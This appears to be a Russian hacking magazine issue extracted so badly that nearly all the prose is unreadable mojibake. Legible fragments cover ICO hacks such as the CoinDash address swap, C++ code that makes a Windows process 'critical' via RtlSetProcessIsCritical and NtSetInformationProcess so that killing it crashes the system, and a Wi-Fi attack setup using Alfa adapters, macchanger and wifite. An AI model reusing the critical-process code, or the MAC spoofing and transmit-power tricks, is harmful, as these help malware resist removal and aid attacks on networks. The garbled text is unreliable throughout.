??????�?????�?�??�??��???�?�??�???�???�??�??�?�(??�??????�?�???
????�?????�??� ?????�?????�??).� ?????�???�?,� ???�?????� ???�????� ?� ???�??
???�????� ?� ????�????,� ???�????�??� ?� ????�?,� ??� ???�?????� ???�?.� ???�??
????�???�??�???�???�?�???�??�??�??�??�??�??�??�????�?.�??�????�
?????�?� ??????�?� ???�??� ?� ????�???� enigma.co� (????,� ??� ???????� ???�????�
??????�??�???�??????,�?�??�???�??�???�????)��??�??�??�?燬lack.
??�????� ???�??� ?� enigma.co,� ??????� ???�????�?� ???� ?????� ???�???
???????,�?????�?�?�???�燬lack��???�??�???�??�??��??�???�??�????
???�????� ??� ????�??�???� ????�?.� ???� ???� ?� ???�?� ???�??????�???� ????
?????,� ??� ???????� ????�???????� ???????�?� ??????.� ???�?� ??� ???�???� ????�
????�92燛TH��????�?�?????�?�??�?????�??�????.
???????
???�????�??�??,�??�??�???,�??�???�??�???�?��???營CO.�????燚DoS?
????� ???????�??�?� ?� ???�????� ????�?????�??,� ??????� ????�????� ?� ?????
???�???�燭elegram�燬lack,�???�?�???�?�??�????.
??�??� ????�??,� ???� ?????� ???�???�?,� ?� ??????� ???�?� ??� ???�?� ICO.
????�??????�????�???�??:�??�?????�?�??�????�??�??�??�??�???�???
???????��???????�????�??�?�???.
???�???� ?????� ???�?� ????� ???�??� CoinDash.� ??� ???�?� ICO� ????� CoinDash
???� ????�??,� ??????� ???�?????� ??� ????�??� ????�???� ???�???� ??????�??�??
???????.� ?????�??� ????,� ???� ???� ???????�?� ????????� ??????�???� ?????�
??????�?� ??� ??� ??????�?� CoinDash,� ?� ??� ?????�???.� ???�??�?� ???�?� ???�?
????�?�???�????�??????�??,�??????��??????�????�??�?��0燛TH.
??�??�?�??�???�??�?????�??????�??��??�????�?�????�??????�??,
?????�????��???�??????.
??????
??�???�????�???�?�??�?�???�?,�??�?�?營CO�??????�??????????�?????�
????� ???�??.� ???�????� ?????�????�??� ?????,� ???� ???�???,� ???�????�???�?
???�??� DDoS????�??� ??� ????� ???�???.� ?????� ???�?� ???�?� ?????� ?????:
??????� ??????�?� ?????�????� ???�?,� ????�?� ???????� ?????� ?� ???�?????�?
?� ????????.� ??????� ??????�???� ?????� ???,� ???� ???� ?� ????�?.� ?� ???�??� ?� ICO
???�???�?�???�???�????:�??�??�??�??????�??�??�?�??�??�???�??�?
????�?????�?,� ???�??� ????�?� ???�??� ??????�???� ????�?????�?� ??� ?????
??????�?�??�????????�???�?.
???� ??????� ?????� ????�???� ??� ???�?� ?????�????� ???�??�??� ?????
??� ?????�?� ??� ???� ?????�?????�???� ???,� ???�?� ?� ????� ??????�?� ???????
???�??�??�?????�?,�??�???�?�??��?�????.�???�?燛therscan,�???�????�
??�???�?��??�?????�?????�?,�?????�??�???�?�??????�??�??.
??� ???�??�???� ???�????� Chainalysis,� ???�?� 56%� ????� ???????,� ????�??�??
?� ICO,� ????� ??????�?� ?� ???????� ?????�????� ????.� ???�??�??� ????�?
????�?�?�????�?��5�??�?????�??�????.�?�??�??燝roup?IB,�????�
???� ?????�????� ????�????�?� ??????�???�?� ??� 3� ?????� ??� 1� ???�????� ????�
?????� ?� ?????.� ???�??� ??????� ?� ?????� ???????�??� ???�??� ???????
???????� ?� ???????�??.� ?� ???�??� �???�??????�??� ???????�?粻 ???� ????�??�?
???�??�?�??�???�?????�?????�(?????�??�??�??�???�?��???�??�????�
???)��?�???�???�??�????�?�????�?????,�??�??�??�?????.
??�??�??� ???�?� ?� ???�???�????�?� ??????�?� ???�???�???� ???�???
?� ????�????� ????�??,� ????�???�???�?� ??????� ????�????� ?� ???�??�??�??
?� ??????� ???�???�?� ???�???�?� ???�???� ???�??� ??� ?????�????� ????.
?�????,�??�??????�??�?�???�???�?�?????�???�??????�???�??�????�
????????�??�?� ???�???,� ???�??�??� ???????�??� ?????�????� ???�??,� ???�???�
???�?�??�???�?.
??�?????��????�??�??�????,��??�??�????�??��???�??營CO燬TORM
Token�燝oogle.�?�??�???�????�??,�??�??�??�??�???�?��??�?????,
???�????�??� ?????� ???�???�???� ???�???.� ???�?� ????,� ???�?� ??????�???
?????�????燤yEtherWallet.�???�?�??�???�?!
????�????�??????�??�??� etherscamdb.info,�??�???�???�?�?????�?營CO.
?�??�???�??�?????�???�33�???�????.�????�???�?�??�????�??????
?????�???.�??�???�?�???�?燤yEtherWallet�??????�??�???�?�06�?????�
?????�??????.
?????�??????�????�????
??�??� ???�??� ????�??� ???� ?????� ICO??????�?� ?� ????????� ?????�??� ???�?
???????�?� ???�?.� ???� ???�???�?� ?????� ????�????�???� ????�????� ?� ?????�
??????�??,� ???�????�??� ?� ?????????�???�??� ?� ??????�?� ?� ???????�??
??????�??.� ?� ????� ????� ?????�???� ???�????�?� ?� ????�???�??� ??,� ????
??????�??????��?????�??�??�???�?????�?????�??�????�?�???�?.
??�????�??�??��??�??燭he燚AO,��?????�?�??�?????�???�?�??????
???� ???????� 53� ???�????� ???�????.� ???�??� ???�??� ?� ???�??� aeternity,
?� ??????�?� ??�?� ??????�?� 30� ???�?????� ???�????� ?????� ????????????�
???????��?????�?燩arity.
???�????�?� ?????????�???�??� ???????� ???�???�?� ????�??�???.� ????�
?????,��?????�??�??�?�??�??�?????�???�??�(PDF)�??�???�??�??�???�
????� ???�??�??�??.� ?????�??�?� ?� ?????�?� ????????� ???????�????� ?� ?� ????�
????,�??�???� Oyente� ???�???�?� ?????????�???�?� ??� ???�????�?� ?� ????�????�
???�??�?????.
???�??� ???�?,� �??�?????�??粻 ?????????�???�?� ???� ???�??� ????� ????�
????�??� ?� ????� ???????� ???�??????.� ???�????,� ?� ????�??� ??????� �???�?
????:�????�???�??�?????�?�??�?????�??�????????�???�??粻(PDF)�?????�
????�???�??�????��??�??�???�??�???�???�?�???�???�???,�??�??�?
??????�?????�????????�???�?�?�???.
???�???????�??????:�??????�???????
??�??� ???�????� ?????� ??????� ???�???� ?� ???� ???� ?????�?.� ???�??� ??????
???�?????�??� ????�????,� ??????�???� ???�??�?????� ????�???� ?????�???�??
????�??� ?????�??� ???�????� ?� ????,� ???� ????�???� ???�??�??�??� ?� ???�????
???�??�???�???�?� ?� ???�?????� ??????�?� ???�???????� ???�?????� ????�?
??�????�????�??�?�?????��??�???,�??�??�???�?????�????�?,�?????
???�??�?�??�??��??�????.�???�??�?�????�???�???�?�??�??�???�??
???�??�??�??�??�?�???�??????�??�?????�??.
????,� ???� ???� ???�?� ???�???,� ???�?� ???�???�??� ICO� ??� ????� ????�???
???�???�??.
1.�?�???� ??� DDoS????�?.� ????�????�?� ???�??� ???�??�??�??� ???�??� ?????�
????�???��??�???�??�?�???.�??�?�??????�??�?????�?�????�???�??
???????�?燚DoS.�????�???????�??�?�????�??�??????�???�????�?????�
???�??????�??�?�??�????.
2.�?�???�????�?�??�???.�??�??�?�????�?�??�??�???????�???�???�
??????�??� ????�???� ?� ????�??�??� ?????,� ???�?????� ????�?????�??� ??????�
??????�??,�???�???�?????�??�?????�?.
3.�?�????�???�??� ???????�????� ???�???�??.� ?????�???�?,� ???�?� ????�
??????� ???� ??� ???????� ???�????�??� ?� ???�???� ?????�???�??� ???�???�?
???�???��??�??�??�???�??�?�??�????.
4.�??�??�?� ?????????�???�??� ??� ???????� ?????�???� ???�????�??.� ???�?
???�??????�???�?????�???�?�???�???�??�???�????�??�?.
5.�??�???� ????�??�?� ???�????�???� ??????.� ???� ????�?????�?� ????�??
?�??????�???,�??????�??�????�????�???�?�??�???�???�????�?????�
???�??????�??�?�?????�??????.
??????
???�??�???�????� ?????� ??????�?� ?????� ????� ??� ????�???????�???� (???�?,
???????�?,� ??????�?,� ???�?),� ??� ????�?� ?� ??????,� ???� ????????� ???�?
????�??� ???�???� ?� ???�????�?� ?????� ????�????�????,� ??????�?????� ????�
???????� ????�??�?.� ?� ???�??� ?� Ethereum� ????�????�???� ????�???�???� ???� ?
???�????�???� ?� ????�???�??� ?????????�???�??,� ???� ?� ?� ??????� ???�??�???
????�?????� ???�?� ?????�??,� ???�??�???�??� ????�????� ?� ?????�?.� ??????�
???� ???????� ????� ??� ???�?� ?????� ???�??�????� ??????� ?????????�???�??
?�??�????�?????�???�??�?.�??�???�????��?????�???�????�??�?????
???????�?????�?�??�??????�???�?????�?��???�?????�??.
?????
?????????
???????
Nik燴erof
xtahi0nix@gmail.com
??????�????????
?�????????????�????????
?????????�???????�燱INDOWS
?????�??�??�??�??�???�????�??�???�??�???�?牜???�???�
????粻 ?� ????� ?????�???� ????� ??� ???,� Windows� ???????
?�????�????�???�?��??????�????�?.�???�??????�????�
????�?� ??????�???�???:� ????� ???�???� ????� ???�???� ???�???�
???,� ??� ???� ????�?� ?????� ?????�???� ????�?� ???.� ?� ????
??????� ?� ??????,� ???� ???�?????� ?????� ???�??�?� ?� ???� ????�
??????�?�??�??????�??�???.
??�?��??,�??�?????�???�???�???�?????�??�??�?�?�????�????,�??�?
????�???????� ??????�?� ???� ????�??� ???????� ????�??�??�???,� ????�????�?
?????�????.�???�??�??�?????�?,�?�?�??�????�??�?????�??�?�????.
???�????,�??�?�?????�?????�???�???�?????�???,�?��????�??�???�
????�????�??�????�?�??�???�?�??�??�???�???????燢ernel燩atch燩rotec?
tion.�???�???�??�?????��??�??�??�?�???,�??????�?�??�????.
??�??� ???�?????,� ???� ???�???� ???�??�??� ???�???� ?� Windows,� ???� ????�
??????,� ???� ???�???� ????�???� ???�??�??,� ?� ???� ???� ?????�???� ???� ???????
???�???�燘SOD.�???�?�?????,�??�?????�?�????�?�??�???,��??�???�
???� ?????.� ????� ???�???� ?� Windows� ?� ???� ??????� ???�?� ???�??�???
???�??????,��??????��????�???�?�??.
WARNING
????� ???,� ???????� ?� ???�???� ?� ??????,� ????�
???????�?� ???????�??� ?????????� ????�?� ?� ????�
?????�??� ??????,� ??????� ???� ?????�????� ????�
?????�???� ???�??�?� ???????� ????�??�?????
????��??????�??�???�燘SOD��????燙RITI?
CAL_PROCESS_DIED��??�?????�??????�???�
???.� ???� ???�?� ?� ???�????� ?� VirtualBox� ??� Win?
dows�燣TSB爔64��????�??�??�?.
????� ???�???�?� ???????,� ???????� ???????� ???� ???�???� ???�??�??� ???�???.
???� ???� ????�???� ??� ??????�????� ??????�?� NTAPI� (Native� Windows� API),
??????� �??�?????�?????�,� ???????� ???�?� ?????�???� ?� ??????� ?????�
??????�?.�??�??�???�?????�???�???� ntoskrnl.exe.�????�???�??� ntdll.
dll�?�??�??�???????�?�???�?��??�???�?.
RTLSETPROCESSISCRITICAL
???�??�??�???燦ative燗PI,�??????�??????�??�???????�??�???�??�???�
???�??,��??燫tlSetProcessIsCritical.�?�??�????�??�????�??:
NTSYSAPI
NTSTATUS
STDAPIVCALLTYPE
RtlSetProcessIsCritical(
牋營N牋BOOLEAN牋NewValue,
牋燨UT燩BOOLEAN燨ldValue燨PTIONAL,
牋營N牋BOOLEAN牋CheckFlag
);
???�?�??�??�???�??�???�?,�????�?�??????�??�?�????�???????�???�
????�??� SeDebugPrivilege.� ???� ???�?� ???�???� ?????� �???�??粻 ???�???
WinAPI.
BOOL爏etPrivileges(LPCTSTR爏zPrivName)
{
牋燭OKEN_PRIVILEGES爐p�爗�;
牋燞ANDLE爃Token��
牋爐p.PrivilegeCount��
牋爐p.Privileges[0].Attributes�燬E_PRIVILEGE_ENABLED;
牋爄f�(!OpenProcessToken(GetCurrentProcess(),燭OKEN_ADJUST_PR
IVILEGES,�&hToken))
牋牋牋爏td::cout�<�"OpenProcessToken爁ailed\n";
牋爄f�(!LookupPrivilegeValue(NULL,爏zPrivName,�&tp.Privileges[0].
Luid))
牋牋牋爏td::cout�<�"LookupPrivilegeValue爁ailed\n";
牋爄f�(!AdjustTokenPrivileges(hToken,燜ALSE,�&tp,爏izeof(tp),燦ULL,�
NULL))
牋爗
牋牋牋爏td::cout�<�"AdjustTokenPrivileges爁ailed\n";
牋牋牋燙loseHandle(hToken);
牋牋牋爎eturn燭RUE;
牋爙
牋爎eturn燜ALSE;
}
??�??�??�???�??�?????�??燬E_DEBUG_NAME�????�????:
setPrivileges(SE_DEBUG_NAME);
???�??� ???�??� ????????� ??� ?� ???� ?????�??� ???�???� RtlAdjustPrivilege:
???�?� ????????� ??� ?� ?????�??� ???�???� ???????�?� ???�????� 20� (SE_DEBUG_?
NAME).� ??????�???,� ?????� ???????� ????� ???�???� ??� ?????� ???�???� ????????
??爊tdll.dll�?????�??�?.�????�????�??�?????�????�???�??:
PBOOLEAN爌bEn;
RtlAdjustPrivilege(20,燭RUE,燜ALSE,爌bEn);
????,�??�???�??�?????�?,�???�???�?��????�????�???????�??�??�?????�
???�?.
typedef燦TSTATUS(NTAPI�*pRtlSetProcessIsCritical)(BOOLEAN燽NewValue,�
BOOLEAN�*pbOldValue,燘OOLEAN牋CheckFlag);
bool爏et_proc_critical()
{
牋爌RtlSetProcessIsCritical燫tlSetProcessIsCritical��(pRtlSe
tProcessIsCritical)GetProcAddress(LoadLibrary(("ntdll.dll")),�"RtlSet
ProcessIsCritical");
牋牋牋爄f�(NT_SUCCESS(RtlSetProcessIsCritical(TRUE,�燜ALSE)))�
return燭RUE;
牋牋牋牋牋爀lse爎eturn燜ALSE;
}
?????� ???� ?????�?:� ???�???� RtlSetProcessIsCritical� ??????�?� ???????�
???�??� ???�?????� ?????�??�?� GetProcAddress/LoadLibrary� ???�????
??爊tdll.dll.�????�???�??�??�????�?�???�??�??��??
if�(NT_SUCCESS(RtlSetProcessIsCritical(TRUE,�燜ALSE)))爎eturn燭RUE;
?????� ??� ??????�?� ???�????� TRUE,� ???�????� ???�???� RtlSetProcessIs?
Critical�??�???�??�???�??�??�??.�??????�??�?�?�??�???�?�??�???�
??????�?�??�????,���??�??�??�?�???�??�???�??�??�???� TRUE.�???
???�???� RtlSetProcessIsCritical� ?� ???????�??� FALSE,� ???�???� ??????�
?????�???�??�??�??.
??�??� ???�??� ???�???� ????�?� ?� ???�????�?,� ???� ????�?� ??????�?� ????�
????燫tlSetProcessIsCritical.�??�?????�?�??�???燦tSetInformation?
Process� ??� Native� API,� ???????� ????�???�?� ?� PEB� ???�??�?� ?� ????�?� ?� ???
????燭hreadBreakOnTermination��??��???�???�?�?,�??�?�??�???�???
???�???�??�??�???�??�??�??.
INFO
????� ????�????� ???�??�?� (Process� Environment
Block,� PEB)� ?????�???�?� ???�????�??� ???�????�
?????� ???�???,� ???????�?� ?� ????????� ?????�
?????�??�??�??�?��????�???�?????�???�??
??�?????爑sermode.�?�????�??�??�?�????�
???�????,� ????�?� ???�?� ??????� ???????�??
?�??????�?????,�?�???�????,��??�????�??
???????.� ????????� ?????�???� PEB� ???�?,� ?????�
???�???� ?� ???� ???�????� ??� ????�?� fs:[30h]
???爔86????�??�爂s:[60h]�??爔64.
??�??� ????�??,� ??� ??????�??� ??� ???�???� ??????,� ???????� ???�?????�???�
????�??�??�????�??�??�??�??�??�??.
NTSETINFORMATIONPROCESS
NtSetInformationProcess� ?� ???� ?????�??� ???�???,� ???????� ???????� ???
????�???� ???�????� ????� ThreadBreakOnTermination� ?� PEB� ??� ???�??� ???.
?????�???�??�???�???�?????�???????�?????�??�?�?爊tdll.dll,�??�?
???�?????�� RtlSetProcessIsCritical.� ????� ?????� ???�??�????,� ???�????�
??,� ??????�??� ???� ???�???,� ??� ????�?????�?� ???�????�????� ?� ?????� ????�
????�??�????燱indows:燫tlSetProcessIsCritical�????�???�???�?�燱in?
dows�
??�??�????�????�??�?????�??�?????�???�??.
typedef燦TSTATUS(WINAPI�*pNtQueryInformationProcess)(HANDLE,燩ROCES
SINFOCLASS,燩VOID,燯LONG,燩ULONG);
pNtSetInformationProcess燦tSetInformationProcess��(pNtSetInformati
onProcess)GetProcAddress(LoadLibrary(("ntdll.dll")),�"NtSetInformatio
nProcess");
bool爏et_proc_critical(HANDLE爃Proc)
{
牋燯LONG燾ount��
牋爄f�(NT_SUCCESS(NtSetInformationProcess(hProc,
牋牋牋牋牋�1D,�//燭hreadBreakOnTermination��????????燩ROCES
SINFOCLASS
牋牋牋牋牋�&count,
牋牋牋牋牋爏izeof(ULONG))))
牋牋牋爎eturn燭RUE;
牋爀lse爎eturn燜ALSE;
}
?� ???�???� NtSetInformationProcess� ??????�?� ?????� ???�??�?,� ???????
?????� ??????� ???�??�??,� ?� ???�?� 0x1D,� ???????� ????�???� ThreadBreakOn?
Termination��????�???燩ROCESSINFOCLASS.
????????�??????????�???????
??�???,� ???????,� ???� ???�???�????� ???�???� ????�???�?� ???�??� ?????� ????�
???�??,� ?� ????,� ?????� ????�?� ???�???� WinAPI� ?� NTAPI� ???� ???� ????� ???????�
????,� ??� ???�?� ???�??� ????�?????,� ????�???� ??� ?????� ???�???� ???�??�??
???�??.�??�???�?,�??�???�???�?�??�?�??�???�???�?????�?.
BOOL燾heck_critical(HANDLE爃Proc)
{
牋燯LONG燾ount��
牋爄f(NT_SUCCESS(NtQueryInformationProcess�(hProc,
牋牋牋牋牋�1D,�//燭hreadBreakOnTermination��????????燩ROCES
SINFOCLASS
牋牋牋牋牋�&count,
牋牋牋牋牋爏izeof(ULONG),
牋牋牋牋牋燦ULL))�&&燾ount)
牋牋牋爎eturn燭RUE;
牋爀lse爎eturn燜ALSE;
}
?????� ?� ???�???� NtQueryInformationProcess� ??????�???� ?????� ????�????�
???�?� ???� ???�??�?� ?� ????� ?� ?????�???� PROCESSINFOCLASS,� ???????� ???�?
???�?????.� ???�?� ?????�????� ???�???� NtQueryInformationProcess� ????�
????�?�??????�??燾ount,�??????�??�??�??�?�??�???,�???�??�???�???�
???�??.
???�?�??�???� NtQueryInformationProcess,�???�??�????�??�??�???,
????�????�??�??� ????�?� ???� ?????� ????,� ?� IsProcessCritical.� ??� ????�
?????�??�????�????�???�??.
BOOL營sProcessCritical(HANDLE爃Process,燩BOOL燙ritical);
???�??�?????�??????�???�??�???:
PBOOL爐est�燜ALSE;
if(IsProcessCritical(GetCurrentProcess(),爐est))
{
牋爄f(test)爏td::cout�<�"Critical爌rocess\n";
牋爀lse爏td::cout�<�"NOT燾ritical爌rocess\n";
}
???�???� IsProcessCritical� ????�??� ???????�??� test� ??� TRUE,� ????� ????�
????�??�??�??,�??�???�??燜ALSE��??�??�??,�???�??�?�??.
??????
?� ????� ??????� ?� ???�????�?� ???�??�???,� ???� ?????� ???�??�??� ???�??�?,
???�?�????�???�?�?�????�????.�??�?�?�???�?,�??�????�???�??�???�
?????� ?� ???�??�?,� ???�?� ???� ???�????�????� ?????�???,� ?� ???� ????�??�??
???�?????,� ????�???� ??� ???�???� ???�??�??.� ?� ????�??,� ???� ??� ??� ??????
???�?????� ???????�??� ???????�??� ?� ???�???�?????� ?????.� ??,� ???�?� ???
???�????�??�????�??!�?)
?????
????牜?????�
??????,
?�??�
?????!
?????????��??????????
????????�?????燱I?FI
84ckf1r3
84ckf1r3@gmail.com
?� ????�??� ?????�?� ?� ???�?????� ?????� ???�???� Wi?Fi� ??
?????�???� ???????� ???�???,� ?� ???�??� ???�??�?� ??� ?????
????�??????.�
???�???�??�
???�??�????�
????�????
?� ???????� ???�????� ??????� ???�??.� ???� ????�?????,� ????�
??�?????�?????�???�??�??�??�???�???�?,�??�???�????�
??� ?????�???� ???�??�??�??� ???�???,� ???�?????� ????�??
????��???�???�???�??�??�?燤AC?????�??.
WARNING
???� ???????�??� ???�??�????�?� ?????�?????�?
?�???�???�???�??�????.�?�????�??,�?�????
??� ?????� ??????�???�????� ??� ?????� ???�?????
????,�??�????�??�?????�??�?�??�??�?????.
???????????�???????燱I-FI-????????
????�??� ???�?� ??� ????????�????� ???�?� ???�??� ???�???� ???�???.� ????� ?????
???�??�???�??�????�?�???�??�???�??,�??�?�???�???�??�??�??�??�???�
??????� ?????� ???�???� ?� ?????�?????� ???� ??????� ???�???�?.� ???????�??�?
???� ?????� ???�??� ???????�??,� ???�?� ????�?????� ??� ?????�?� ????�??????�
???�??�?????�?燱PS??????�?�??�?????�???.
????�??�???�????�??�???�?
???�???�?�??�?????�?,�??�???�?�??�???�???�???��????�????燨f?
fensive� Security,� ????�???�???� ???????�??� ???�??�????� Kali� Linux.� ???�????�
????�?� ?� ???�???�??�?� ??� ????�???,� ???� ???�???� ????,� ????????� ?� ???� ???�?
???�???燱i?Fi�(?????�燗P,燼ccess爌oints)��???????�??�???�?�??�?��???�
??????�?�???�??�???�??�??�???�??.�?�???��????�???�????,��??????�
??�??????�???�??????�??�??/???.
??�???�??�???�??�?燯SB?????�???�?�????�???�?�??????�?���??
?????�??�??�??�????,��???�??�???�?�??�??????�??�???�???�??�???�
?????�?� ??????�???� ????�??� ??????.� ?????�?� ???�?� ???�???� Wi?Fi?????�??
??� ????�?� ?� ???�??????� ?????,� ??� ?� ?� ????�?????� ???�????�????� (?� ?� ????�
???���??????�???�???�???�?).
???�???�???�?�??�?�?????�???�?????�?燗lfa燦etwork.�???�??�?????�
???�??�??�?????�??????�??�???�???�???�???�???�?????�???�?????.
???�????,� AWUS051NH� v2� ?????� ????�???�????,� ??� ???�??� ???� ??� ???� ??
????燫T3572,��??�??�????�???�?.
???燫T3572
?????�???燗WUS051NH爒2
?�???牜???�???�??粻???燫T3572��???�?�??�????�??�????�???�(????��???�
???� ????�????� ??� Alfa� Network� ???� ???� ???�?).� ??� ???� ??????� ???�???�????
?�???�??�?�?�??�??��????�??�???��???�??�??�???��??��???.
????燗WUS051
????�??��?????�?????�??�???�???�???�燦etis燱F2150.�??�????�??�???�
??��??�?,�?�?�??�?????�??�???�????.
????燱F2150
???�?�燗P,��??�???�??�???�?�???�???�??�?�??�???�???��??.�???�
?????� ??� �??�???�??粻 ???� RT5572N,� ??????�???� ???�???�???� ???�??�???
?????�??�????�??�??�?�?????�???�???.�??�??�????�????,�??�?�??
?????�???��??�??�???�???�??�??????��???�???�???�???�?�?�??�?.
????�?� ????�???�??� ???�????� (??)� ????�??� ???????� ?� ????� ???�?� ?� ????
???�??,�??�???�?�???�?��????�??�??�????�??�??��??�???�????.
????�?� ???� ??????� ???????,� ????�?� ???�????� ??� ????�????� ???�??????�
?????� ?� ????�??�????�????� ?� ???�????� ???�?????�???� ???????�?.� ?????
?????� �??粻 ????�?� ???�?????�?,� ?� ???� ??????�??� ???????� ???�?????� ?????
????�?�?�???�???.�??�????�???�??????�??�??�??�????��????�????.
??� ???�????�?� ???�????�??� ???� ???�?????�??�???� ??????�??� ???�??�?
?�????�??�??�?,�??�???�?�?�??�??????�??????�????�??????.
INFO
??�????� ?� ?????� ???????� ??� ?????� ????� ???????�
????�???,�??�???�??�??�?�?�??.�????�?
????�?�?�??�??????,�??�?????�??�??????�?
??????��??�???�???�????,��?�????�?�????�
??????�?????�?��??��???�?�????�??�?�???�
??????.� ????�?� ??????�??� ????� ?� ???�??�???
??????� ??????�??�?� ?� ???�???�?� ?� ???????
????�??�???�?????�??�????�??�?????�????�????�
???� ???�???�?,� ?????�????� ???� ????�??????
???????�??�??�??�??�??�????�?????�??�???�
?????.
??????????? ??????
?
??? �?????�?????
?????
????牜?????�
??????, ?�??�
?????!
?????????��??????????�???????
??????燱I?FI
???�????�??????�???
??�???� ?� ??????� ?� ????�??�???�??� ???�???�??� ?????�????� ???????�?,
????�?� ????�???� ????� ???�???�??� ???�?� ??� ????� ???.� ????�??????� ???�?
??�??�??�??�??�???�?????�?�?????��???�???�?�??,�??�?�??�???�??
???????.�??�????,�??�???�??�?????�???�?????�??,�????�??�?????�??
???�???� ???�?????� ???�?� ???�???� ?????�???� ???�???�??� ?????�???.� ????� ??
????�?� ???�???� ?????�??� AP,� ???�????� ??� ?� ???�?� ???�?� �???� ???�??�,
?� ???�????� ??????�??� ??????� ??� ?????�????� ???�??�???� ??????�??.� ???
???�??�???�??�???�??????�???,�?�??�??�?????
????�??�???�???:�??�?�???�??�???�??�??�???�??�?????�??�????
???�??�???.� ?� ???�??� ???�??� ?????� ????� ????�???� ?� ?????�??,� ???�??�?
?????� ??????.� ??????�???� ?� ???�?????� ????� 100� ???� ???�?� ?????�???�?
??�????�?.�???�????�????�?�??�???�??�??,�????�?�??�???�??�??�??
????�??.
WARNING
??�????� ??� ???????� ???�????,� ????�??� ???�??
?????�???�???� (???�??�?� ?� ??????� ???????
???????),�?????�?�?????�??�?��???�???�???
??????�??� ????�????� ???� ???�????.� ?????�?
??� ?????� ???�?� 33� dBm.� ???�????� ??????
?���???�?�??�???�???�??�????.�??�?�????
???????�????�??,�
?????�?�
???�??�?
??� ?????????�?� dBm� ????� ????�?????� ??????�??
???�????.
??�???�????�??燱i?Fi???????�???�???�?�???????�??�??�????.��????
??????� ???� ?????�???�?� ???�????� ????�????� ISO� 3166,� ???????� ????�??
?� ????� ???�??� ???�??�??�??� ??????�??.� ?� Linux� ???� wireless� regulatory� data?
base.� ?� Kali� Linux� (????�??� Nethunter)� ???� ???????�?� ??� ????�?� /lib/crda/
regulatory.bin.� ????� ????� ???�???�?� ?????� ???�????�??� ????� ???�??� ????�
?????�??????�??� ???�??�?� (Central� Regulatory� Domain� Agent� ?� CRDA)
?� ??????�???� ????� ???????�??� ?� ???,� ?????� ???�????� ?????�???
???� ???????�???� ?� ???�??� ????�??.� ?????� ????�??,� ?� ??� ???�???�?� ?????
???�?????� ???�???�?� ???�????� ???????�???� ???� ?????� Wi?Fi?????�????
??�??�???�??�??�??�??�??�???????�?.
??�???�????�???�?�????�???????????�??�?�???�??燛MEA,�??�???�
????�???�???�?�??�??�0�??�(20�??).�????�?,�??�??�??�????�????,
??� ??????� ????�?� ?????� ??????� deauth� ?� ??????�?� ???�?????� ???�??�??� AP.
????� ???� ????�??� ????� 20� ???,� ?� ????�??� ????� ??????� ??????�??�???
??????�?�?????�???�?�??�?????.
???�??????� ???????� ????�?,� ???�?????� ??????� ?� ???�????�??� ???�???
???�????� ???�?� ?????�??� iw� list,� ????�?� ??� ??????� ??????�???� ?????
????�??�(??�??�???�?�???�??).
????�??�??????�?�??�??�??�??�?????�??
???�??� ???�?????� MAC??????� ?� ?????�??� ???�????� ???????�???� ????�??
?????�??爄w�???_??????????>爄nfo.
???�????????�??�?�??�??�?
??� ???�???� BackTrack� ???�?� ????� ????�?� ?????� ????�??� ??????�????� (????�
?????,�?燗lfa燦etwork)��??�?�???????�??�??�?�??�????.�???��??,�??
?� ???� ????�???�?� ???� ???�??� ?????� ????�????�??� ???,� ???????� ???�???�?
??????�?????�???�??�??�????.�??�????,�??牜BO粻?�??????.�??�????
???� ????� ???�?????� ???�????� ???????�????� IEEE� 802.11b/g/n� ??� 2000� ???
(33�??).�??��???�???�??�???�?�??�????�?�???�????��??�??.�???�
???��??????�??�???�?�???�???�??���??�(1000�??),�?�??�??�??�?
??�??????�??�?�????�???�??�??�?.
??�??�?� ????�????�??� ???�???�?� ????�???????,� ?� ????� ?� ??� ??� ??????
????�?????�?????????�??�??????.�????�?�??�??�????�?牜???�?粻?????�
????????��??????.�??�?�??�???�?�?�??�??�?????�??????�??�???�?
???�??�??�????.�??�?????�???�????:�???�???�??�??�???�???�?,�???�
???�???� �??�?粻 ???� ???�??� ???�????�??� ????�??,� ??????� ?????� ???????
???�????�??????�???��??�??????�?�?????.�??�???�???�?,��???�????�
???�??�??�???�??�??�??�????�??�???�???�???�?.��??�????�?�??�????
????�??�??:燢ali,燘ugTraq營I,燘ackbox,燙yborg�燤atriux.�??�?�????�?�??�?
????�??��??�???�??�??�????�??�???�?�??�???�?��???�????.
??�?????� ???�??�????� ????� ????�?� ?� Backbox.� ???�????� ???�??�??�???
????????�?� ?� ???� ???�????� ???� wlxmac,� ???� ????�?� mac� ?� ?????� ????�???,
???????�??� ?� ???�??� ?????�??.� ???�???� macchanger� ????�???�???� ???�???�
???,�???�?�??�????�???????�?�???�???�???�??.�??�???�?????��???�
??????�????�?�??�???�????�(??.�????�?�??�??).
???�??�??�????爓lan�燘ackbox
??�??� ????�??� ???�?????� ???�???�??� ???�????� ???????�???� ????�??,
??�??�??�?�?????.�????�?�??�????�??�?????�?�?�??�???燢ali�18.1.
INFO
????�????�?�??�????�?�????�???�?�?�??�?
?????�???�?????�?.� ?????�?� ???�????� ???� ?????
???�?????�??爏udo��?????�??�??�???�?.
???�???� ??� ????�???�?� ???�?� ???�??�??�??� ????????�??� ?????�??� iw?
config.�????,��??�???,爓lan0�爓lan1��??�?????,�????�?�??�??�???
???�?�??�??�????�??�??�??�???�????�??�??�????,�???��??�??��???�
????��????�??????�??.
???�??�??�??:�??????�?�????�???燯SB??????��????�????�?� iw?
config�?????.�??�????????,�?????�?�?????�??��???�?,��??�??�??.
??�?????�?�??�??�??�??�???????�?
???�??� ???�??:� ??????�?� wifite.� ??� ????� ?� ???�???�?� ???�????�??
?????�??,� ????� ???�?� ????�???�?,� ?????� ?????????� ??????�?????,� ?� ?????�
????�?�?�??�????�???�?���??�???�?�??�???��????�???�??�??�????�
?????.� ????� ?� ???�????� wlan� ????� ?????�???� ???�??� ?� ????�????� USB� ?� ??
?�????.
????�??�????爓lan�爓i?te
???�?� ????� ???� ????�???�???� ?� ???�???�?� ???�??�??�???� ????????�?,
?????�???�??.
ifconfig爓lan1燿own
??�???�??�?�???????�?�??�???燤AC??????�???�???.
macchanger�r爓lan1
????� ?r� ????�?� ???�??�??� ?????,� ?� ????� ??????� ???�???� ????�????�??,
??????�??�???�?mac.�??�????:
macchanger�?mac=2F:4B:D9:33:89:0B爓lan1
??�???�??,�??�??�??�??�??�?�??�???�?�??�???�???�?.�?�??�??�(OUI
vendor爈ist)�???�?� ?????� ???� ?????.� ??� ???�????�?,� ????� ??� ??????� ???????�
??????�??�??�????�?�?????�???�??�???�??�???�??�?�???�??�???????
???�?�??�?????�??�??�??燤AC?????�??.��???�?�??�??燗P�????�?�???�
